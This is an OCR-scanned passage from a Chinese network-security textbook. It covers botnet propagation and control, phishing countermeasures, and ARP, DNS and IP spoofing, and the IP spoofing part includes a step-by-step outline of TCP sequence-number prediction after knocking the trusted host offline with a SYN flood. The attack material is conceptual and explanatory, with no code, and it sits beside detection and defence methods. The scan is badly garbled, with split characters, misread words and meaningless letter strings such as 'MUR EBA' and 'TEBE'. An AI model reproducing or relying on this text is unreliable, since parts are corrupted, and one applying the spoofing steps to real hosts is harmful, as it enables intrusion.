WindowsVulnerabilityScanner 这 个 工具 进行 系统 漏洞 维护 。 如 果 是 Linux 系统 , 可 以 利用 
sXid, LSAT 等 主机 扫描 和 Nmap, Nessus 等 网 络 扫 描 工 具 发 现 漏洞 。 


3.3.6 ”僵尸 网 络 


僵尸 网 络 (Botnet) 是 指 采 用 一 种 或 多 种 传播 手段 ， 将 大 量 主机 感染 bot HF E 
程序 )， 从 而 在 控制 者 和 被 感染 主机 之 间 所 形成 的 一 个 可 一 对 多 控制 的 网 络 ， 如 图 3-42 
所 示 。 在 Botnet 的 概念 中 有 这 样 几 个 关键 词 。bot 程序 是 robot 的 缩写 ， 是 指 实现 恶意 控 
制 功能 的 程序 代码 ， 伪 尸 计算 机 就 是 被 植 入 bot 的 计算 机 ; 控制 服务 器 (ControlServer) 
是 指控 制 和 通信 的 中 心服 务 器 ， 在 基于 IRC (IntemetRelayChat， 因 特 网 中 继 聊 天 ) 协议 
进行 控制 的 Botnet 中 ， 就 是 指 提供 IRC 聊天 服务 的 服务 器 。 

Botnet 首先 是 一 个 可 控制 的 网 络 ， 这 个 网 络 并 不 是 指 物理 意义 上 具有 拓扑 结构 的 网 
络 ， 它 具有 一 定 的 分 布 性 ， 随 着 bot 程序 的 不 断 传播 而 不 断 有 新 位 置 的 僵尸 计算 机 添加 
到 这 个 网 络 中 来 。 其 次 ， 这 个 网 络 是 采用 了 一 定 的 恶意 传播 手段 形成 的 ， 例 如 主动 漏洞 
攻击 ， 邮 件 病毒 等 各 种 病毒 与 蠕虫 的 传播 手段 ， 都 可 以 用 来 进行 Botnet 的 传播 ， 从 这 个 
意义 上 讲 ， 恶意 程序 bot 也 是 一 种 病毒 或 肾 虫 。 最 后 一 点 ， 也 是 Botnet 的 最 主要 的 特点 ， 
就 是 可 以 一 对 多 地 执行 相同 的 恶意 行为 ， 比 如 可 以 同时 对 某 目标 网 站 进行 分 布 式 拒绝 服 
% (DDos) 攻击 ， 同 时 发 送 大 量 的 垃圾 邮件 等 ， 而 正 是 这 种 一 对 多 的 控制 关系 ， 使 得 攻 
击 者 能 够 以 极 低 的 代价 高 效 地 控制 大 量 的 资源 为 其 服务 , 这 也 是 Botnet 攻击 模式 近年 来 
受到 黑客 青睐 的 根本 原因 。 在 执行 恶意 行为 的 时 候 ，Botmet 充当 了 一 个 攻击 平台 的 角色 ， 
这 也 就 使 得 Botnet 不 同 于 简单 的 病毒 和 蠕虫 ， 也 与 通常 意义 的 木马 有 所 不 同 。 
3.3.6.1 Botnet 的 工作 过 程 

Botnet 的 工作 过 程 包括 传播 、 加 入 和 控制 三 个 阶段 。 一 个 Botnet 首先 需要 的 是 具有 
一 定 规模 的 被 控 计 算 机 ， 而 这 个 规模 是 逐渐 地 随 着 采用 某 种 或 某 几 种 传播 手段 的 bot 程 
序 的 扩散 而 形成 的 ， 在 这 个 传播 过 程 中 有 如 下 几 种 手段 : 

© 主动 攻击 漏洞 。 其 原理 是 通过 攻击 系统 所 存在 的 漏洞 获得 访问 权 , 并 在 Shellcode 
执行 bot 程序 注入 代码 ， 将 被 攻击 系统 感染 成 为 僵尸 主机 。 属 于 此 类 的 最 基本 的 感染 途 


oop 


Hp 
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径 是 攻击 者 手动 地 利用 一 系列 黑客 工具 和 脚本 进行 攻击 , 获得 权限 后 下 载 bot 程序 执行 。 
攻击 者 还 会 将 僵尸 程序 和 蠕虫 技 术 进行 结合 ， 从 而 使 bot 程序 能 够 进行 自动 传播 ， 著 名 
的 bot 样本 AgoBot， 就 是 实现 了 将 bot 程序 的 自动 传播 。 


僵尸 网 络 


图 3-42 ”僵尸 网 络 示意 图 


@ 邮件 病毒 。bot 程序 还 会 通过 发 送 大 量 的 邮件 病毒 传播 自身 ， 通 常 表现 为 在 邮件 
附件 中 携带 僵尸 程序 以 及 在 邮件 内 容 中 包含 下 载 执行 bot 程序 的 链接 ， 并 通过 一 系列 社 
会 工程 学 的 技巧 诱 使 接收 者 执行 附件 或 点 击 链接 ， 或 是 通过 利用 邮件 客户 端的 漏洞 自动 
执行 ， 从 而 使 得 接收 者 主机 被 感染 成 为 僵尸 主机 。 

© 即时 通信 软件 。 利 用 即时 通信 软件 向 好 友 列 表 发 送 执行 僵尸 程序 的 链接 ， 并 通 
过 社会 工程 学 技巧 诱骗 其 点 击 ， 从 而 进行 感染 ， 如 2005 年 年 初 爆发 的 MSN 性 感 鸡 
(Worm.MSNLoveme) 采用 的 就 是 这 种 方式 。 

@ 恶意 网 站 脚本 。 攻 击 者 在 提供 Web 服务 的 网 站 中 在 HTML 页 面 上 绑 定 恶意 的 脚 

， 当 访问 者 访问 这 些 网 站 时 就 会 执行 恶意 脚本 ， 使 得 bot 程序 下 载 到 主机 上 ， 并 被 自 
动 执行 。 

© 特洛伊 木马。 伪装 成 有 用 的 软件 ， 在 网 站 、FTP 服务 器 、P2P 网 络 中 提供 ， 诱 骗 
用 户 下 载 并 执行 。 

通过 以 上 几 种 传播 手段 可 以 看 出 , 在 Botnet 的 形成 中 传播 方式 与 星 虫 和 病毒 以 及 功 
能 复杂 的 间谍 软件 很 相近 。 

在 加 入 阶段 ， 每 一 个 被 感染 主机 都 会 随 着 隐藏 在 自身 上 的 bot 程序 的 发 作 而 加 入 到 
Botnet 中 去 ， 加 入 的 方式 根据 控制 方式 和 通信 协议 的 不 同 而 有 所 不 同 。 在 基于 IRC 协议 
的 Botnet 中 ， 感 染 bot 程序 的 主机 会 登录 到 指定 的 服务 器 和 频道 中 去 ， 在 登录 成 功 后 ， 
在 频道 中 等 待 控制 者 发 来 的 恶意 指令 。 

在 控制 阶段 ， 攻 击 者 通过 中 心服 务 器 发 送 预先 定义 好 的 控制 指令 ， 让 被 感染 主机 执 
行 恶意 行为 ， 如 发 起 DDos 攻击 、 窃 取 主 机 敏感 信息 、 更 新 升级 恶意 程序 等 。 
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3.3.6.2 Botnet 的 分 类 

Botnet 根据 分 类 标准 的 不 同 ， 可 以 有 许多 种 分 类 。 按 bot 程序 的 种 类 分 类 : 

®© Agobot/Phatbot/Forbot/XtremBot。 这 可 能 是 最 出 名 的 僵尸 工具 。 防 病毒 厂商 
Spphos 列 出 了 超过 500 种 已 知 的 不 同 版 本 的 Agobot (Sophos 病毒 分 析 )， 这 个 数目 也 在 
稳步 增长 。 僵 尸 工具 本 身 使 用 跨 平 台 的 C++ 写成 。Agobot 最 新 可 获得 的 版 本 代码 清晰 
且 有 很 好 的 抽象 设计 ， 以 模块 化 的 方式 组 合 ， 添 加 命令 或 者 其 他 漏洞 的 扫描 器 及 攻击 功 

非常 简单 ， 并 提供 像 文件 和 进程 隐藏 的 Rootkit 能 力 在 攻陷 主机 中 隐藏 自己 。 在 获取 该 
样本 后 对 它 进行 逆向 工程 是 比较 困难 的 ， 因 为 它 包 含 了 监测 调试 器 (Softice 和 O11Dbg) 
和 虚拟 机 (VMware 和 VirtualPC〉 的 功能 。 

@ SDBot/RBot/UrBot/SpyBot/. 这 个 家 族 的 恶意 软件 目前 是 最 活跃 的 bot 程序 软件 ， 
SDBot 由 C 语言 写成 。 它 提供 了 和 Agobot 一 样 的 功能 特征 ， 但 是 命令 集 没 那么 大 ， 实 
现 也 没 那么 复杂 。 它 是 基于 IRC 协议 的 一 类 bot 程序 。 

@ GT-Bots. GT-Bots 是 基于 当前 比较 流行 的 IRC 客户 端 程序 mIRC 编写 的 ，GT 是 
(GlobalThreat) 的 缩写 。 这 类 僵尸 工具 用 脚本 和 其 他 二 进 制 文件 开启 一 个 mIRC 聊天 客 
户 端 ， 但 会 隐藏 原 mIRC 窗口 。 通 过 执行 mIRC 脚本 连接 到 指定 的 服务 器 频道 上 ， 等 待 
恶意 命令 。 这 类 bot 程序 由 于 捆绑 了 mIRC 程序 , 所 以 体积 会 比较 大 , 往往 会 大 于 IMB. 

按 Botnet 的 控制 方式 分 类 : 

© IRCBotnet 是 指控 制 和 通信 方式 为 利用 IRC 协议 的 Botnet, 形成 这 类 Botnet 的 主 
要 bot 程序 有 spybot、GTbot 和 SDbot， 目 前 绝 大 多 数 Botnet 属于 这 一 类 别 。 

@ AOLBotnet 与 IRCBot 类 似 ，AOL 为 美国 在 线 提供 的 一 种 即时 通信 服务 ， 这 类 
Botnet 是 依托 这 种 即时 通信 服务 形成 的 网 络 而 建立 的 ， 被 感染 主机 登录 到 固定 的 服务 器 
上 接收 控制 命令 .AIM-Canbot 和 Fizzer 就 采用 了 AOLInstantMessager 实现 对 Bot 的 控制 。 

@ P2PBotnet。 这 类 Botnet 中 使 用 的 bot 程序 本 身 包含 了 P2P 的 客户 端 ， 可 以 连 入 
采用 了 Gnutella 技术 (一 种 开放 源码 的 文件 共享 技术 〉 的 服务 器 ， 利 用 WASTE 文件 共 
享 协议 进行 相互 通信 。 由 于 这 种 协议 分 布 式 地 进行 连接 ， 就 使 得 每 一 个 僵尸 主机 可 以 很 
方便 地 找到 其 他 的 僵尸 主机 并 进行 通信 , 而 当 有 一 些 bot 被 查 杀 时 , 并 不 会 影响 到 Botnet 
的 生存 ， 所 以 这 类 的 Botnet 具有 不 存在 单 点 失效 但 实现 相对 复杂 的 特点 。Agobot 和 
Phatbot 采用 了 P2P 的 方式 。 
3.3.6.3 ”僵尸 网 络 的 防御 方法 

目前 比较 流行 的 基于 IRC 协议 的 BotNet 防御 方法 ， 主 要 有 使 用 蜜 网 技术 、 网 络 流 
量 研 究 以 及 IRCserver 识别 技术 。 

1. 使 用 密 网 技术 

蜜 色 技术 是 一 种 欺骗 入 侵 者 以 达到 采集 黑客 攻击 方法 和 保护 真实 主机 目标 的 诱骗 
技术 。 而 蜜 网 技术 就 是 包含 了 一 个 或 多 个 密 缸 的 一 个 网 络 体系 架构 ， 在 架构 中 同时 保证 
了 网 络 的 可 控 性 ， 以 及 提供 多 种 工具 以 方便 对 攻击 信息 的 采集 与 分 析 。 使 用 蜜 网 技术 研 
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究 BotNet 首先 通过 密 钢 尽 可 能 地 得 到 各 种 流传 在 网 络 中 的 bot 程序 样本 , 通过 一 定 的 技 
术 手 段 获得 隐藏 在 代码 中 的 登录 BotNet 的 所 需 属性 ， 如 BotNet 服务 器 地 址 、 服 务 端口 、 
登录 所 使 用 到 的 用 户 名 称 等 ， 具 备 这些 条 件 后 ， 就 可 以 使 用 一 个 编制 的 模拟 客户 端 加 入 
到 BotNet 中 ， 收 集 更 多 的 信息 。 这 种 方法 的 优点 是 能 够 有 效 地 捕获 比较 活跃 的 BotNet, 
并 且 准 确 率 也 比较 高 ， 同 时 ， 由 于 可 以 获得 程序 中 包含 的 一 些 特征 值 ， 可 以 对 BotNet 
进行 更 深层 次 的 研究 。 但 这 种 方法 对 于 不 再 传播 的 BotNet 是 无 法 捕获 的 。3.36 小 节 将 详 
MUR EBA 

2. 网 络 流量 研究 

网 络 流量 的 研究 是 通过 分 析 BotNet 中 僵尸 主机 的 行为 特征 , 将 僵尸 主机 划分 为 长 期 
发 呆 型 和 快速 加 入 型 。 如 果 僵 尸 主机 在 BotNet 中 存在 , 那么 它 会 有 三 个 较 明 显 的 行为 特 
征 ， 一 是 通过 蠕虫 传播 的 僵尸 程序 ， 大 量 的 被 其 感染 计算 机 会 在 很 短 的 时 间 内 加 入 到 同 
一 个 IRCserver 中 ; 二 是 僵尸 主机 一 般 会 长 时 间 在 线 ; 三 是 僵尸 主机 作为 一 个 IRC 聊天 
用 户 ， 在 频道 内 长 时 间 不 发 言 。 这 样 ， 将 第 一 种 行为 归 入 快速 加 入 型 ， 将 第 二 、 第 三 种 
行为 归 入 长 期 发 采 型 。 通 过 研究 这 两 类 计算 机 行为 的 网 络 流量 变化 ， 就 可 以 实现 对 
BotNet 的 判断 。 这 种 方法 能 够 通过 对 网 关 流量 的 分 析 来 判断 BotNet 存在 的 可 能 性 ， 但 
BotNet 的 流量 往往 会 淹没 在 海量 的 网 关 流量 中 ， 很 难 有 效 地 区 分 出 来 。 

3. IRCServer 识别 技术 的 研究 

通过 登录 实际 的 基于 IRC 协议 的 BotNet 的 服务 器 端 ， 可 以 看 到 ， 攻 击 者 为 了 保护 
自己 隐藏 耻 C 服务 器 的 部 分 属性 。 同 时 ， 通 过 对 Bot 程序 代码 的 分 析 ， 可 以 看 到 ， 当 被 
感染 主机 加 入 到 控制 服务 器 时 ， 在 服务 器 端 能 够 表现 出 许多 具有 规律 性 的 特征 ， 归 纳 总 
结 后 就 形成 了 可 以 用 来 判断 基于 IRC 协议 的 BotNet 的 服务 器 端的 规则 ， 这 就 可 以 确定 
出 BotNet 的 位 置 、 规 模 、 分 布 等 ， 为 下 一 步 的 工作 提供 支持 。 


3.3.7 ”网 络 钩 全 


网 络 钓鱼 〈Phishing， 与 钓鱼 的 英语 fishing 发 音 相近 ， 又 名 钓鱼 法 或 钓鱼 式 攻 击 ) 
是 通过 大 量 发 送 声 称 来 自 于 银行 或 其 他 知名 机 构 的 欺骗 性 垃圾 邮件 ， 意 图 引诱 收 信人 给 
出 敏感 信息 〈 如 用 户 名 、 口 令 、 账 号 ID、AIMPIN 码 或 信用 卡 详细 信息 ) 的 一 种 攻击 方 
式 。 最 典型 的 网 络 钓鱼 攻击 将 收 信人 引诱 到 一 个 通过 精心 设计 与 目标 组 织 的 网 站 非常 相 
似 的 钓鱼 网 站 上 ， 并 获取 收 信人 在 此 网 站 上 输入 的 个 人 敏感 信息 ， 通 常 这 个 攻击 过 程 不 
会 让 受害 者 警觉 。 它 是 “社会 工程 攻击 ”的 一 种 形式 。 

网 络 营销 中 一 些 有 效 的 、 具 有 可 操作 性 的 防范 措施 和 技巧 很 多 ， 这 里 介绍 一 些 主要 
方法 。 

1. 申请 并 安装 数字 证 书 

数字 证 书 是 驾驶 执照 、 护 照 和 会 员 卡 的 电子 对 应 物 。 可 以 通过 出 示 电子 数字 证 书 来 
证 明 身 份 从 而 获得 访问 在 线 信息 或 服务 的 权利 。 数 字 证 书 将 身份 绑 定 到 一 对 可 以 用 来 加 
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密 和 签名 数字 信息 的 电子 密 钥 。 能 够 验证 一 个 人 使 用 给 定 密 钥 的 权利 ， 这 有 助 于 防止 有 
人 利用 假 密 钥 冒充 , 确保 交易 中 各 方 身份 的 真实 。 数字 证 书 由 CA 认证 中 心 发 放 并 使 用 。 
被 广泛 接受 的 数字 证 书 格式 由 CCITTX.509 国际 标准 定义 ;因此 任何 符合 X.509 的 应 用 
程序 都 可 读 写 证 书 。 

数字 证 书 可 以 向 银行 或 第 三 方 安全 认证 机 构 去 申请 。 中 国 金 融 认证 中 心 (CFCA 
ChinaFinancialCertificationAuthority) 就 是 金融 行业 权威 的 第 三 方 安全 认证 机 构 。 也 是 数 
字 证 书 的 发 放 机 构 。 申 请 CFCA 证 书 ， 可 以 到 已 经 获 该 证 书 审批 的 多 家 商业 银行 进行 申 
请 。 银 行 会 把 申请 人 的 信息 传送 到 CFCA， 经 审核 后 ， 申 请 人 会 获得 相应 的 密码 ， 赁 这 
些 密码 就 可 登录 到 CFCA 的 网 站 下 载 数字 证 书 , 并 把 它 保 存在 USBKEY (电子 钥匙 ) 上 。 
作为 提供 权威 数字 证 书 的 第 三 方 ， 如 果 是 由 于 CFCA 原因 使 客户 受到 损失 ，CFCA 会 承 
担 相应 的 赔偿 责任 。 目 前 标准 是 企业 客户 最 高 赔偿 80 万 元 ， 个 人 客户 最 高 赔偿 2 万 元 。 

2. 规范 使 用 操作 

实践 证 明 : 规范 使 用 操作 其 实 是 一 种 非常 简单 的 自我 保护 方式 。 可 以 从 连接 来 源 、 
证 书 使 用 场合 等 方面 ， 通 过 规范 使 用 场合 来 规避 和 预防 网 络 诈骗 案件 的 发 生 。 

。 做 到 “三 及 时 一 避免 >。 及 时 安装 并 升级 杀毒 软件 ， 及 时 安装 个 人 防火 墙 ， 及 时 
安装 操作 系统 补丁 ， 避 免 下 载 来 路 不 明 的 文件 。 
不 在 不 安全 的 地 点 进行 在 线 交 易 。 使 用 网 络 银行 时 ， 选 择 使 用 网 络 凭证 及 约定 账 
户 方式 进行 转账 交易 ， 不 要 在 网 吧 、 公 用 计算 机 上 和 不 明 的 地 下 网 站 做 在 线 交 易 
或 转账 。 
。 不 盲目 接受 英文 邮件 。 大 部 分 的 “网 络 钓鱼 ”信件 是 使 用 英文 ， 除 非 在 国外 申请 

该 服务 ， 不 然 应 该 收 到 的 一 般 应 是 中 文 信件 。 遇 到 可 疑 信 件 不 随意 打开 ， 也 可 转 


发 给 网 络 安全 机 构 。 
。 认真 查 对 短信 的 来 源 。 对 银行 发 来 的 手机 短信 ， 如 涉及 到 账号 问题 要 和 银行 进行 
验证 性 电话 确认 。 


。 对 要 求 重新 输入 账号 信息 要 进行 电话 验证 。 只 要 接 到 “要 求 重 新 输入 账号 ,否则 
将 停 掉 信 用 卡 账号 ”之 类 的 邮件 应 提高 警惕 性 。 不 仅 不 要 回复 或 者 点 击 邮件 的 链 
接 ， 而 且 可 以 使 用 电话 联系 对 该 信息 的 真 伪 进行 确认 。 

。 访问 网 站 一 定 使 用 浏览 器 直接 访问 。 输 入 网 址 前 ， 有 必要 确认 网 址 的 来 源 。 特 别 
是 在 信箱 中 经 常会 收 到 一 些 莫名 其 妙 的 来 信 ， 切 不 可 随意 点 击 邮件 中 的 链接 和 随 
意 使 用 短信 即时 通信 工具 如 QQ、MSN 等 。 


3.3.8 ”网 络 欺骗 


3.3.8.1 ARP 欺骗 
1. ARP 欺骗 原理 
ARP 原理 : 某 机 器 A 要 向 主机 C 发 送 报 文 , 会 查询 本 地 的 ARP 缓存 表 ， 找到 C 的 
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IP 地址 对 应 的 MAC 地 址 后 ， 就 会 进行 数据 传输 。 如 果 未 找到 ， 则 广播 一 个 ARP 请 求 报 
文 (携带 主机 A 的 下 地 址 I 一 一 物理 地 址 AA:AA:AA:AA), WR IP 地 址 为 的 主机 C 
回答 物理 地 址 Pc。 网 上 所 有 主机 包括 C 都 收 到 ARP HR, 但 只 有 主机 C 识别 自己 的 中 
地 址 ， 于 是 向 A 主机 发 回 一 个 ARP 响应 报 文 。 其 中 就 包含 有 C 的 MAC 地 址 
CC:CC:CC:CC, A 接收 到 C 的 应 答 后 ， 就 会 更 新 本 地 的 ARP 缓存 。 接 着 使 用 这 个 MAC 
地 址 发 送 数据 〈 由 网 卡 附加 MAC 地 址 )。 因 此 ， 本 地 高 速 缓存 的 这 个 ARP 表 是 本 地 网 
络 流通 的 基础 ， 而 且 这 个 缓存 是 动态 的 。 

ARP 协议 并 不 只 在 发 送 了 ARP 请 求 才 接 收 ARP 应 答 。 当 计算 机 接收 到 ARP 应 答 
数据 包 的 时 候 ， 就 会 对 本 地 的 ARP 缓存 进行 更 新 ， 将 应 答 中 的 卫 和 MAC 地 址 存储 在 
ARP 缓存 中 。 因 此 ， 局 域 网 中 的 机 器 B 首先 攻击 C 使 CHEK, Wa A 发 送 一 个 自己 
伪造 的 ARP 应 答 , 而 如 果 这 个 应 答 是 B 冒充 C 伪造 来 的 , 即 IP 地 址 为 C fy IP, 而 MAC 
地 址 是 B 的 , 则 当 A 接收 到 B 伪造 的 ARP 应 答 后 ， 就 会 更 新 本 地 的 ARP 缓存 ， 这 样 在 
A 看 来 C 的 卫 地 址 没有 变 , 而 它 的 MAC 地 址 已 经 变 成 B 的 了 。 由 于 局 域 网 的 网 络 流通 
不 是 根据 TP 地 址 进行 ， 而 是 按照 MAC 地 址 进行 传输 。 如 此 就 造成 A 传送 给 C 的 数据 
实际 上 是 传送 到 B。 这 就 是 一 个 简单 的 ARP 欺骗 ， 如 图 3-43 所 示 。 


C 的 MAC 地 址 为 
BB:BB:BB:BB 
MAC: CC:CC:CC:CC > 


攻击 ， 使 T = 
C REK A A 


MAC: BB:BB:BB:BB 
图 3-43 ARP 欺骗 


2. ARP 欺骗 的 防范 措施 

®© 在 winxp 下 输入 命令 : arp-s gate-way-ip gate-way-mac 固化 arp 表 , 阻止 arp 欺骗 。 

@ 使 用 ARP 服务 器 。 通 过 该 服务 器 查找 自己 的 ARP 转换 表 来 响应 其 他 机 器 的 ARP 
广播 。 确 保 这 台 ARP 服务 器 不 被 黑 。 

© 采用 双向 绑 定 的 方法 解决 并 且 防 止 ARP 欺骗 。 

@ ARP 防护 软件 一 ARPGuard。 通 过 系统 底层 核心 驱动 ,无 须 安装 其 他 任何 第 三 方 
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软件 (如 WinPcap)， 以 服务 及 进程 并 存 的 形式 随 系统 启动 并 运行 , 不 占用 计算 机 系统 资 
源 。 无 需 对 计算 机 进行 P 地 址 及 MAC 地 址 绑 定 ， 从 而 避免 了 大 量 且 无 效 的 工作 量 。 也 
不 用 担心 计算 机 会 在 重启 后 新 建 ARP 缓存 列表 , 因为 此 软件 是 以 服务 与 进程 相 结 合 的 形 
式 存 在 于 计算 机 中 ， 当 计算 机 重启 后 软件 的 防护 功能 也 会 随 操作 系统 自动 启动 并 工作 。 
3.3.8.2 DNS 欺骗 

DNS 欺骗 是 一 种 比较 常见 的 攻击 手段 。 一 个 著名 的 利用 DNS 欺骗 进行 攻击 的 案例 ， 
是 全 球 著 名 网 络 安全 销售 商 RSASecurity 的 网 站 所 遭 到 的 攻击 。 其 实 RSASecurity 网 站 
的 主机 并 没有 被 入 侵 ， 而 是 RSA 的 域名 被 黑客 劫持 ， 当 用 户 连 上 RSASecurity 时 ， 发 现 
主页 被 改 成 了 其 他 的 内 容 。 

1. DNS 欺骗 的 原理 

DNS 欺骗 首先 是 冒充 域名 服务 器 ， 然 后 把 查询 的 他 地 址 设 为 攻击 者 的 他 地址 ， 这 
样 的 话 ， 用 户 上 网 就 只 能 看 到 攻击 者 的 主页 ， 而 不 是 用 户 想 要 取得 的 网 站 的 主页 了 ， 这 
就 是 DNS 欺骗 的 基本 原理 。DNS 欺骗 其 实 并 不 是 真 的 “ 黑 掉 ”了 对 方 的 网 站 ， 而 是 冒 
AWE TATA T o 

2. DNS 欺骗 的 现实 过 程 

如 图 3-44 所 示 ，www.xxx.com 的 IP 地 址 为 202.109.2.2， 如 果 www.angel.com |i] 
xxx.com 的 子 域 DNS 服务 器 查询 www.xxx.com 的 IP 地 址 时 ，www.heike.com 冒充 DNS 
向 www.angel.com 回复 www.xxx.com 的 IP 地 址 为 200.1.1.1, 这 时 www.angel.com 就 会 把 
200.1.1.1 当 www.xxx.com 的 地 址 了 。 当 www.angel.com 连 www.xxx.com 时 ， 就 会 转向 那 
个 虚假 的 下 地址 了 ， 这 样 对 www.xxx.com 来 说 ， 就 算是 给 黑 掉 了 。 因 为 别人 根本 连接 不 
上 他 的 域名 。 


DNS 服 务 器 


WWW.XXX.com 
IP: 200.1.1.1 
G2 


WWW.XXX.com 


> IP is 200.1.1.1 
IP; 202.109.2.2 D | = 


www.heike.com www.angel.com 
IP: 200.1.1.1 


图 3-44 DNS 欺骗 


3. DNS 欺骗 的 检测 
根据 检测 手段 的 不 同 , 将 其 分 为 被 动 监听 检测 、 虚 假 报 文 探测 和 交叉 检查 查询 3 种 : 


PA 加 


| Bg 
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O 被 动 监听 检测 : 该 检测 手段 是 通过 旁 路 监听 的 方式 ， 捕 获 所 有 DNS 请 求 和 应 答 
数据 包 ， 并 为 其 建立 一 个 请 求 应 答 映射 表 。 如 果 在 一 定 的 时 间 间 隔 内 ， 一 个 请 求 对 应 两 
个 或 两 个 以 上 结果 不 同 的 应 答 包 ， 则 怀疑 受到 了 DNS 欺骗 攻击 ， 因 为 DNS 服务 器 不 会 
给 出 多 个 结果 不 同 的 应 答 包 ， 即 使 目标 域名 对 应 多 个 IP 地 址 ，DNS 服务 器 也 会 在 一 个 
DNS 应 答 包 中 返回 ， 只 是 有 多 个 应 答 域 (AnswerSection) 而 已 。 

@ 虚假 报 文 探 测 : 该 检测 手段 采用 主动 发 送 探测 包 的 手段 来 检测 网 络 内 是 否 存在 
DNS 欺骗 攻击 者 。 这 种 探测 手段 基于 一 个 简单 的 假设 ; 攻击 者 为 了 尽快 地 发 出 欺骗 包 ， 
不 会 对 域名 服务 器 IP 的 有 效 性 进行 验证 。 这 样 如 果 向 一 个 非 DNS 服务 器 发 送 请 求 包 ， 
正常 来 说 不 会 收 到 任何 应 答 , 但 是 由 于 攻击 者 不 会 验证 目标 IP 是 否 是 合法 DNS 服务 器 ， 
他 就 会 继续 实施 欺骗 攻击 ， 因 此 如 果 收 到 了 应 答 包 ， 则 说 明 受 到 了 攻击 。 

@ 交叉 检查 查询 : 所 谓 交 又 检 查 即 在 客户 端 收 到 DNS 应 答 包 之 后 ， 向 DNS 服务 
器 反 向 查询 应 答 包 中 返回 的 IP 地 址 所 对 应 的 DNS 名字， 如 果 二 者 一 致 说 明 没有 受到 攻 
击 ， 和 否则 说 明 被 欺骗 。 
3.3.8.3 IP 欺骗 

1. IP 欺骗 的 原理 

通过 编程 的 方法 可 以 随意 改变 发 出 的 包 的 IP 地 址 ， 但 工作 在 传输 层 的 TCP 协议 是 


正式 传输 数据 之 前 ， 需 要 用 “三 次 握手 ”来 建立 一 个 值得 信赖 的 连接 。 假 设 是 hosta 和 
hostb 两 台 主机 进行 通信 , hostb 首先 发 送 带 有 SYN 标志 的 数据 段 通知 hosta 建立 TCP 连 
接 ，TCP 的 可 靠 性 就 是 由 数据 包 中 的 多 位 控制 字 来 提供 的 ， 其 中 最 重要 的 是 数据 序列 
SYN 和 数据 确认 标志 ACK。B 将 TCP 报头 中 的 SYN 设 为 自己 本 次 连接 中 的 初始 值 
ASN). 

假如 想 冒 充 hostb 对 hosta 进行 攻击 ， 就 要 先 使 用 hostb 的 IP 地 址 发 送 SYN 标志 给 
hosta， 但 是 当 hosta 收 到 后 ， 并 不 会 把 SYN+ACK 发 送 到 欺骗 者 的 主机 上 ， 而 是 发 送 到 
真正 的 hostb 上 去 ， 这 时 就 “ 露 陷 ”了 ， 因 为 hostb 根本 没 发 送 发 SYN 请 求 。 所 以 如 果 
要 冒充 hostb， 首 先 要 让 hostb 失去 工作 能 力 。 也 就 是 所 谓 的 拒绝 服务 攻击 ， 让 hostb 
TEBE 

可 是 这 样 还 是 远 远 不 够 的 ， 最 困难 的 就 是 要 对 hosta 进行 攻击 ， 必 须知 道 hosta 使 用 
的 ISN。TCP 使 用 的 ISN 是 一 个 32 位 的 计数 器 ， 从 0 到 4，294，967，295。TCP 为 每 
一 个 连接 选择 一 个 初始 序列 号 ISN， 为 了 防止 因为 延迟 、 重 传 等 扰乱 三 次 握手 ，ISN 不 
EBA EE, AIM ABTA GIA. ISN 约 每 秒 增加 128000， 如 果 有 连接 出 现 ， 
每 次 连接 将 把 计数 器 的 数值 增加 64000。 很 显然 , 这 使 得 用 于 表示 ISN 的 32 位 计数 器 在 
没有 连接 的 情况 下 每 9.32 小 时 复位 一 次 。 之 所 以 这 样 ， 是 因为 它 有 利于 最 大 于 度 地 减少 
“ 旧 有 ”连接 的 信息 干扰 当前 连接 的 机 会 。 如 果 初 始 序 例 号 是 随意 选择 的 ， 那么 不 能 保证 
现 有 序 例 号 是 不 同 于 先前 的 。 假 设 有 这 样 一 种 情况 ， 在 一 个 路 由 回路 中 的 数据 包 最 终 跳 
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出 循环 ， 回 到 了 “ 旧 有 ”的 连接 ， 显 然 这 会 对 现 有 连接 产生 干扰 。 

预测 出 攻击 目标 的 序 例 号 非常 困难 ， 而 且 各 个 系统 也 不 想 同 ， 在 Berkeley 系统 ， 最 
初 的 序列 号 变量 由 一 个 常数 每 秒 加 1 产生 , 等 加 到 这 个 常数 的 一 半 时 , 就 开始 一 次 连接 。 
这 样 ， 如 果 开 始 一 个 合法 连接 ， 并 观察 到 一 个 ISN 正在 使 用 ， 便 可 以 进行 预测 ， 而 且 这 
样 做 有 很 高 的 可 信 度 。 现 在 假设 黑客 已 经 使 用 某 种 方法 ， 能 预测 出 ISN。 在 这 种 情况 下 ， 
他 就 可 以 将 ACK 序列 号 送 给 hosta， 这 时 连接 就 建立 了 。 

2. IP 欺骗 的 过 程 

IP 欺骗 由 若干 步骤 组 成 ， 下 面 是 它 的 详细 步骤 。 

黑客 为 了 进行 对 hosta 的 IP 欺骗 ， 要 进行 以 下 工作 : 使 被 主机 hostb 失去 工作 能 力 ， 
同时 采样 目标 主机 hosta 发 出 的 TCP 序 例 号 ， 猜 测 出 它 的 数据 序 例 号 。 然 后 ， 伪 装 成 主 
机 hostb， 同 时 建立 起 与 目标 主机 hosta 基于 地 址 验证 的 应 用 连接 。 连 接 成 功 后 ， 黑 客 就 
可 以 设置 所 谓 的 “后 门 ”以 便 日 后 使 用 。 

(1) 使 被 信任 主机 失去 工作 能 力 

为 了 伪装 成 主机 hostb 而 不 露 陷 ， 需 要 使 其 完全 失去 工作 能 力 。 由 于 攻击 者 将 要 代 
替 主 机 hostb， 他 必须 确保 主机 hostb 不 能 收 到 任何 有 效 的 网 络 数据 ， 和 否则 将 会 被 揭穿 。 
有 许多 方法 可 以 达到 这 个 目的 (如 SYN 洪水 攻击 、TIN、Land 等 攻击 )。 现 假设 已 经 使 
用 某 种 方法 使 得 主机 hostb 完全 失去 了 工作 能 

(2) 序 例 号 取样 和 猜测 

前 面 讲 到 了 , 对 目标 主机 hosta 进行 攻击 , 必须 知道 目标 主机 hosta 的 数据 包 序 例 号 。 
通常 如 何 进行 预测 呢 ? 往往 先 与 被 攻击 主机 hosta 的 一 个 端口 (如 : 25) 建立 起 正常 连 
接 。 通 常 ， 这 个 过 程 被 重复 N 次 ， 并 将 目标 主机 最 后 所 发 送 的 ISN 存储 起 来 。 然 后 还 需 
要 进行 估计 他 的 主机 hosta 与 主机 hostb 之 间 的 往返 时 间 , 这 个 时 间 是 通过 多 次 统计 平均 
计算 出 来 的 。 往 返 连接 增加 64000。 现在 就 可 以 估计 出 ISN 的 大 小 是 128000 乘 以 往返 时 
